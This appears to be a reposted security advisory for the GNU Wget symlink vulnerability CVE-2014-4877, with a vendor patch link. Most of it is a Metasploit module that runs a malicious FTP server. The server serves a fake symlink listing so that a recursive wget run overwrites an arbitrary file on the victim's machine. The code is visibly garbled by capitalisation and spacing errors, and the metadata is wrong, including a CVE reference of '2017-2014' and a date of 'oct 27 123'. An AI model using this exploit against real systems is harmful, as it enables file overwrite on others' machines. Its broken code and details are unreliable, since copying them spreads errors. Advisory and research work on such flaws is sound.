GNU Wget symbolic link Vulnerability (CVE-2014-4877)

GNU Wget symbolic link Vulnerability (CVE-2014-4877)

Release date:
Updated on:

Affected Systems:
GNU wget
Description:
Bugtraq id: 70751
CVE (CAN) ID: CVE-2014-4877

GNU Wget is a free software package used to retrieve files using HTTP, HTTPS, and FTP protocols.

GNU Wget has a symbolic link vulnerability. Attackers can exploit this vulnerability to access files outside the restricted directory, obtain sensitive information, and perform other attacks.

Linux wget command details

Use wget/aria2 for offline bulk download in Linux

An error is reported when wget is used in Linux.

Linux download command wget Usage Details

Wget

Tips for using the Linux Command Line download tool wget

<* Source: vendor
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
##
# This module requires Metasploit: http // metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

Require 'msf/core'

Class Metasploit3 <Msf: aupoliciary

Include Msf: Exploit: Remote: FtpServer
Include Msf: Auxiliary: Report

Def initialize
Super (
'Name' => 'gnu Wget FTP Symlink Arbitrary Filesystem access ',
'Description' => % q {
This module exploits a vulnerability in Wget when used in
Recursive (-r) mode with a FTP server as a destination.
Symlink is used to allow arbitrary writes to the target's
Filesystem. To specify content for the file, use
"File:/path" syntax for the TARGET_DATA option.

Tested successfully with wget 1.14. Versions prior to 1.16
Are presumed vulnerable.
},
'Author' => ['hdm'],
'License '=> MSF_LICENSE,
'Actions' => [['service'],
'Passiveactions' => ['service'],
'References '=>
[
['Cve', '2017-2014 '],
['Url', 'https: // bugzilla.RedHat.com/show_bug.cgi? Id = 1139181 '],
['Url', 'https: // URLs]
],
'Defaultaction' => 'service ',
'Disclosuredate' => 'oct 27 123'
)

Register_options (
[
OptString. new ('target _ file', [true, "The target file to overwrite", '/tmp/pwne']),
OptString. new ('target _ data', [true, "The DATA to write to the TARGET file", 'Hello from Metasploit ']),
OptPort. new ('srvport', [true, "The port for the malicious FTP server to listen on", 2121])
], Self. class)

@ Fakedir = Rex: Text. rand_text_alphanumeric (rand (8) + 8)
End

Def run
My_address = Rex: Socket. source_address
Print_good ("Targets shoshould run: $ wget-m ftp: // # {my_address }:# {datastore ['srvport']}/")
Exploit ()
End

Def on_client_command_user (c, arg)
@ State [c] [: user] = arg
C. put "331 User name okay, need password... \ r \ n"
End

Def on_client_command_pass (c, arg)
@ State [c] [: pass] = arg
C. put "230 Login OK \ r \ n"
@ State [c] [: auth] = true
Print_status ("# {@ state [c] [: name]} Logged in with user' # {@ state [c] [: user]} 'and password' # {@ state [c] [: user]}'... ")
End

Def on_client_command_retr (c, arg)
Print_status ("# {@ state [c] [: name]}-> RETR # {arg }")

If not @ state [c] [: auth]
C. put "500 Access denied \ r \ n"
Return
End

Unless arg. index (: File. basename (datastore ['target _ file'])
C. put "550 File does not exist \ r \ n"
Return
End

Conn = establish_data_connection (c)
If not conn
C. put ("425 Can't build data connection \ r \ n ")
Return
End

C. put ("150 Opening BINARY mode data connection for # {arg} \ r \ n ")
Conn. put (datastore ['target _ data'])
C. put ("226 Transfer complete. \ r \ n ")
Conn. close

Print_good ("# {@ state [c] [: name]} Hopefully wrote # {datastore ['target _ data']. length} bytes to # {datastore ['target _ file']} ")
End

Def on_client_command_list (c, arg)

Print_status ("# {@ state [c] [: name]}-> LIST # {arg }")

If not @ state [c] [: auth]
C. put "500 Access denied \ r \ n"
Return
End

Conn = establish_data_connection (c)
If not conn
C. put ("425 Can't build data connection \ r \ n ")
Return
End

Pwd = @ state [c] [: cwd]
Buf =''

Dstamp = Time. at (Time. now. to_ I-(3600*24*365) + (3600*24 * (rand (365) + 1 )))). strftime ("% B % e % Y ")
Unless pwd. index (@ fakedir)
Buf <"lrwxrwxrwx 1 root 33 # {dstamp }#{@ fakedir}->#{:: File. dirname (datastore ['target _ file'])} \ r \ n"
Buf <"drwxrwxr-x 15 root 4096 # {dstamp }#{@ fakedir} \ r \ n"
Else
Buf <"-rwx ------ 1 root # {" % 9d "% datastore ['target _ data']. length }#{ dstamp }#{:: File. basename (datastore ['target _ file'])} \ r \ n"
End

C. put ("150 Opening ASCII mode data connection for/bin/ls \ r \ n ")
Conn. put ("total # {buf. length} \ r \ n" + buf)
C. put ("226 Transfer complete. \ r \ n ")
Conn. close
End

Def on_client_command_size (c, arg)

If not @ state [c] [: auth]
C. put "500 Access denied \ r \ n"
Return
End

C. put ("213 # {datastore ['target _ data']. length} \ r \ n ")
End

Def on_client_command_cwd (c, arg)

Print_status ("# {@ state [c] [: name]}-> CWD # {arg }")

If not @ state [c] [: auth]
C. put "500 Access denied \ r \ n"
Return
End

Upath = "/"
Npath =: File. join (@ state [c] [: cwd], arg)
Bpath = npath [upath. length, npath. length-upath. length]

# Check for traversal abve the root directory
If not (npath [0, upath. length] = upath or bpath = '')
Bpath = '/'
End

Bpath = '/' if bpath =''
@ State [c] [: cwd] = bpath

C. put "250 CWD command successful. \ r \ n"
End
End

Suggestion:
Vendor patch:

GNU
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://git.savannah.gnu.org/cgit/wget.git/commit? Id = 18b0979357ed7dc4e11d4f2b1d7e0f5932d82aa7

This article permanently updates the link address: